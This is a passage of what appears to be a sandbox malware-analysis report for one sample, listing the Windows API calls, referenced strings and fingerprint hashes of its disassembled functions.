                                    • SetMenuItemInfoW.USER32(00A41708,00000004,00000000,00000030), ref: 009C4E8F
                                    • Sleep.KERNEL32(000001F4), ref: 009C4EA1
                                    • GetMenuItemCount.USER32(?), ref: 009C4EE5
                                    • GetMenuItemID.USER32(?,00000000), ref: 009C4F01
                                    • GetMenuItemID.USER32(?,-00000001), ref: 009C4F2B
                                    • GetMenuItemID.USER32(?,?), ref: 009C4F70
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009C4FB6
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C4FCA
                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C4FEB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                    • String ID:
                                    • API String ID: 4176008265-0
                                    • Opcode ID: e50d924df2c575edaddfc5fa5f29d14de5d830c10d48e7aa713685513cdb1a8c
                                    • Instruction ID: 50cf3579290d22ea257922831c98cfc7b6f99dbc8730d3b4f871547578e3b122
                                    • Opcode Fuzzy Hash: e50d924df2c575edaddfc5fa5f29d14de5d830c10d48e7aa713685513cdb1a8c
                                    • Instruction Fuzzy Hash: DA617D75E00249AFEB21CFA4DC98FAE7BB8EB85314F14055DF841A7291D731AD46CB22
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 009E9C98
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 009E9C9B
                                    • GetWindowLongW.USER32(?,000000F0), ref: 009E9CBF
                                    • _memset.LIBCMT ref: 009E9CD0
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009E9CE2
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009E9D5A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow_memset
                                    • String ID:
                                    • API String ID: 830647256-0
                                    • Opcode ID: 5c6207e0dbd66fa2f3c80b52ed186865568ede7da5199668380f1bdf65006904
                                    • Instruction ID: 3085c65ec2f1e7823db79c6fd9d1f2415f3e6112c105e3704ea4b1c6b2a8d050
                                    • Opcode Fuzzy Hash: 5c6207e0dbd66fa2f3c80b52ed186865568ede7da5199668380f1bdf65006904
                                    • Instruction Fuzzy Hash: E7617C79900248AFDB11DFA8CC81FEEB7B8EB49704F144159FA04A7292D774AD82DB50
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 009B94FE
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 009B9549
                                    • VariantInit.OLEAUT32(?), ref: 009B955B
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 009B957B
                                    • VariantCopy.OLEAUT32(?,?), ref: 009B95BE
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 009B95D2
                                    • VariantClear.OLEAUT32(?), ref: 009B95E7
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 009B95F4
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009B95FD
                                    • VariantClear.OLEAUT32(?), ref: 009B960F
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009B961A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    • API String ID: 2706829360-0
                                    • Opcode ID: 52e8dc66a532b0b67f31ac2d06f0f5bb04b41d6f084bbe7361b85f98b58efa7b
                                    • Instruction ID: 31f8cffcde1698c7c1c3f1cd66512a2371e738956f3bd56f04b8c267a7ddf7d9
                                    • Opcode Fuzzy Hash: 52e8dc66a532b0b67f31ac2d06f0f5bb04b41d6f084bbe7361b85f98b58efa7b
                                    • Instruction Fuzzy Hash: 73412F7591021DAFCB01DFE4D884ADEBB79FF48354F008069F902A3261DB71EA46CBA1
                                    APIs
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • CoInitialize.OLE32 ref: 009DADF6
                                    • CoUninitialize.OLE32 ref: 009DAE01
                                    • CoCreateInstance.OLE32(?,00000000,00000017,00A0D8FC,?), ref: 009DAE61
                                    • IIDFromString.OLE32(?,?), ref: 009DAED4
                                    • VariantInit.OLEAUT32(?), ref: 009DAF6E
                                    • VariantClear.OLEAUT32(?), ref: 009DAFCF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    • API String ID: 834269672-1287834457
                                    • Opcode ID: bcb0579d295ed27bfdc3f152597d32901fbd16a76e9f10c87abea2b008c178cf
                                    • Instruction ID: 0c8f50af6de8c709983bad77ea1e089ddb5f8a8380aa83930bd7797d319c9364
                                    • Opcode Fuzzy Hash: bcb0579d295ed27bfdc3f152597d32901fbd16a76e9f10c87abea2b008c178cf
                                    • Instruction Fuzzy Hash: 2761AE71248301AFC710DF94C848B6EBBE8AF89714F14894AF9859B391C774ED59CBA3
                                    APIs
                                    • WSAStartup.WSOCK32(00000101,?), ref: 009D8168
                                    • inet_addr.WSOCK32(?,?,?), ref: 009D81AD
                                    • gethostbyname.WSOCK32(?), ref: 009D81B9
                                    • IcmpCreateFile.IPHLPAPI ref: 009D81C7
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009D8237
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009D824D
                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009D82C2
                                    • WSACleanup.WSOCK32 ref: 009D82C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    • Opcode ID: 6e033ab4bd79c63e09a0dbdfd1f0875b38ce9667918096c79b4b14035452bb8d
                                    • Instruction ID: fa5112d5a5934e7b87dd317ff640696a45212acb902ce981646aa28428497027
                                    • Opcode Fuzzy Hash: 6e033ab4bd79c63e09a0dbdfd1f0875b38ce9667918096c79b4b14035452bb8d
                                    • Instruction Fuzzy Hash: B5518231644700AFDB11EF64CC45B2BB7E4AF88760F04895AFA65D73A1DB74E906CB42
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 009CE396
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009CE40C
                                    • GetLastError.KERNEL32 ref: 009CE416
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 009CE483
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: 729ea0fda1243656dbdc2cc77539087129beb623d9f09de77029af6c49da42da
                                    • Instruction ID: 1beb08af9addf994ab4e69314735b3fb98519c507b187a1eed8b8948cad118dd
                                    • Opcode Fuzzy Hash: 729ea0fda1243656dbdc2cc77539087129beb623d9f09de77029af6c49da42da
                                    • Instruction Fuzzy Hash: 2F315436E00209AFDB05EBA4D945FBDB7B8FF44304F148419F506EB2A1DB749946CB52
                                    APIs
                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009BB98C
                                    • GetDlgCtrlID.USER32 ref: 009BB997
                                    • GetParent.USER32 ref: 009BB9B3
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 009BB9B6
                                    • GetDlgCtrlID.USER32(?), ref: 009BB9BF
                                    • GetParent.USER32(?), ref: 009BB9DB
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 009BB9DE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1383977212-1403004172
                                    • Opcode ID: 901c44cf9f938b3a1fffa1a90ffaef4a906c70f7062eca797d5f20f3a8c4b1b5
                                    • Instruction ID: 04a05984ee7080f5e6afb7e5730731ba1ba7653eed6139fff060ad44674a931b
                                    • Opcode Fuzzy Hash: 901c44cf9f938b3a1fffa1a90ffaef4a906c70f7062eca797d5f20f3a8c4b1b5
                                    • Instruction Fuzzy Hash: 6B2162B5900108BFDB04EBA4CC85EFEB7B9AF45314F10411AF551972D1DBB55916DB20
                                    APIs
                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009BBA73
                                    • GetDlgCtrlID.USER32 ref: 009BBA7E
                                    • GetParent.USER32 ref: 009BBA9A
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 009BBA9D
                                    • GetDlgCtrlID.USER32(?), ref: 009BBAA6
                                    • GetParent.USER32(?), ref: 009BBAC2
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 009BBAC5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1383977212-1403004172
                                    • Opcode ID: f5c38d4383be20d2641b904d7455eda2362ef4cdc279d3d225bb4e6a5acf20b8
                                    • Instruction ID: ee029e6a49cc657cde5a03b33ec313253c30c034e509d3a026dcf531dbfa6317
                                    • Opcode Fuzzy Hash: f5c38d4383be20d2641b904d7455eda2362ef4cdc279d3d225bb4e6a5acf20b8
                                    • Instruction Fuzzy Hash: 33217FB5A40108BBDB01EBA4CC85FFEBBB9EF45310F10401AF551A7292DBB9591A9B20
                                    APIs
                                    • GetParent.USER32 ref: 009BBAE3
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 009BBAF8
                                    • _wcscmp.LIBCMT ref: 009BBB0A
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009BBB85
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameParentSend_wcscmp
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1704125052-3381328864
                                    • Opcode ID: 744b91c7082103a1e2d06c39e5943a85d9738b4704fb58cbdf05f3f1887b17fa
                                    • Instruction ID: c525345b4d4c3c84c4cd49f9edf6c2f0f99cde4a50312a7511787d21c657af9a
                                    • Opcode Fuzzy Hash: 744b91c7082103a1e2d06c39e5943a85d9738b4704fb58cbdf05f3f1887b17fa
                                    • Instruction Fuzzy Hash: F4112977A48317FEFA206630DC07EE6379CAB91774F200022F904E50D5EFE6A8125654
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 009DB2D5
                                    • CoInitialize.OLE32(00000000), ref: 009DB302
                                    • CoUninitialize.OLE32 ref: 009DB30C
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 009DB40C
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 009DB539
                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 009DB56D
                                    • CoGetObject.OLE32(?,00000000,00A0D91C,?), ref: 009DB590
                                    • SetErrorMode.KERNEL32(00000000), ref: 009DB5A3
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009DB623
                                    • VariantClear.OLEAUT32(00A0D91C), ref: 009DB633
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                    • String ID:
                                    • API String ID: 2395222682-0
                                    • Opcode ID: dc297bc409e370f42f383d93b1319fe0efa12cdc421fdc35f954371e408d44d6
                                    • Instruction ID: d2f6e7f2afa63c56f99ffb7d5d47931b87c64dbb58e6b9c72d3d45b8944af156
                                    • Opcode Fuzzy Hash: dc297bc409e370f42f383d93b1319fe0efa12cdc421fdc35f954371e408d44d6
                                    • Instruction Fuzzy Hash: 96C11471608305EFC700DFA4C884A6AB7E9BF89344F05891EF58A9B361DB71ED06CB52
                                    APIs
                                    • __lock.LIBCMT ref: 009AACC1
                                      • Part of subcall function 009A7CF4: __mtinitlocknum.LIBCMT ref: 009A7D06
                                      • Part of subcall function 009A7CF4: RtlEnterCriticalSection.KERNEL32(00000000,?,009A7ADD,0000000D), ref: 009A7D1F
                                    • __calloc_crt.LIBCMT ref: 009AACD2
                                      • Part of subcall function 009A6986: __calloc_impl.LIBCMT ref: 009A6995
                                      • Part of subcall function 009A6986: Sleep.KERNEL32(00000000,000003BC,0099F507,?,0000000E), ref: 009A69AC
                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 009AACED
                                    • GetStartupInfoW.KERNEL32(?,00A36E28,00000064,009A5E91,00A36C70,00000014), ref: 009AAD46
                                    • __calloc_crt.LIBCMT ref: 009AAD91
                                    • GetFileType.KERNEL32(00000001), ref: 009AADD8
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 009AAE11
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                    • String ID:
                                    • API String ID: 1426640281-0
                                    • Opcode ID: c6d286b0bf0083eb9949cad65433ceb7496defd83578692ecb1473d1a74c93aa
                                    • Instruction ID: 54d852187717effe293a615b23a00fc96e049628d473e699149c8ee008482c28
                                    • Opcode Fuzzy Hash: c6d286b0bf0083eb9949cad65433ceb7496defd83578692ecb1473d1a74c93aa
                                    • Instruction Fuzzy Hash: 0A81F3719053458FDB24CFA8C8806ADBBF4AF4B320B24465DE4A6AB3D1D7359803CBD6
                                    APIs
                                    • __swprintf.LIBCMT ref: 009C67FD
                                    • __swprintf.LIBCMT ref: 009C680A
                                      • Part of subcall function 009A172B: __woutput_l.LIBCMT ref: 009A1784
                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 009C6834
                                    • LoadResource.KERNEL32(?,00000000), ref: 009C6840
                                    • LockResource.KERNEL32(00000000), ref: 009C684D
                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 009C686D
                                    • LoadResource.KERNEL32(?,00000000), ref: 009C687F
                                    • SizeofResource.KERNEL32(?,00000000), ref: 009C688E
                                    • LockResource.KERNEL32(?), ref: 009C689A
                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009C68F9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                    • String ID:
                                    • API String ID: 1433390588-0
                                    • Opcode ID: 20aea01246079f11ec5071709dc9f407cec5c4ee9a5b96e2c0632ebdb5e4465e
                                    • Instruction ID: aefe19f826c290228c45f96880119b1e0ee9258f6c72338ca08959f1dbc8c796
                                    • Opcode Fuzzy Hash: 20aea01246079f11ec5071709dc9f407cec5c4ee9a5b96e2c0632ebdb5e4465e
                                    • Instruction Fuzzy Hash: D1316D7690021AABDB11DFA0DD45EBA7BACEF49381F008429F902E2150E774D952DBA1
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 009C4047
                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009C30A5,?,00000001), ref: 009C405B
                                    • GetWindowThreadProcessId.USER32(00000000), ref: 009C4062
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009C30A5,?,00000001), ref: 009C4071
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 009C4083
                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009C30A5,?,00000001), ref: 009C409C
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009C30A5,?,00000001), ref: 009C40AE
                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009C30A5,?,00000001), ref: 009C40F3
                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009C30A5,?,00000001), ref: 009C4108
                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009C30A5,?,00000001), ref: 009C4113
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                    • String ID:
                                    • API String ID: 2156557900-0
                                    • Opcode ID: 777e070f0052f35ca67a997688d7a7c76c1ef51b689304fda4537d38787ac786
                                    • Instruction ID: a1ffbb18c6b38e02e5d29d659b7e86214d599eaed21913de524ba60b8bc43b89
                                    • Opcode Fuzzy Hash: 777e070f0052f35ca67a997688d7a7c76c1ef51b689304fda4537d38787ac786
                                    • Instruction Fuzzy Hash: 1231D57AA00204AFDB10DFD4DC96F7977BDBBA5311F148009F904E6290DBB6DD868B62
                                    APIs
                                    • EnumChildWindows.USER32(?,009BCF50), ref: 009BCE90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ChildEnumWindows
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                    • API String ID: 3555792229-1603158881
                                    • Opcode ID: bb6ca219f625239f6f41f62233d7d7778d1b59f83e715aaa302746889ab5d5ab
                                    • Instruction ID: bf637e60bd0c830d183a0fd2e3278a69c70038737516b698ec7f925dca9453f8
                                    • Opcode Fuzzy Hash: bb6ca219f625239f6f41f62233d7d7778d1b59f83e715aaa302746889ab5d5ab
                                    • Instruction Fuzzy Hash: 6E9174B0A00506EBCB18EF64C582BEAFB75BF44310F548519E499A7291DF30AD59DBE0
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009830DC
                                    • CoUninitialize.OLE32(?,00000000), ref: 00983181
                                    • UnregisterHotKey.USER32(?), ref: 009832A9
                                    • DestroyWindow.USER32(?), ref: 009F5079
                                    • FreeLibrary.KERNEL32(?), ref: 009F50F8
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009F5125
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: a5c53dc81da9ababd21fffb65b3e385baccc18d83e13acb933d1ea9e15e45c0d
                                    • Instruction ID: ba1f0743309508367cb845bf3d85f6d8306cf685ba620a3b682c047b389f62a0
                                    • Opcode Fuzzy Hash: a5c53dc81da9ababd21fffb65b3e385baccc18d83e13acb933d1ea9e15e45c0d
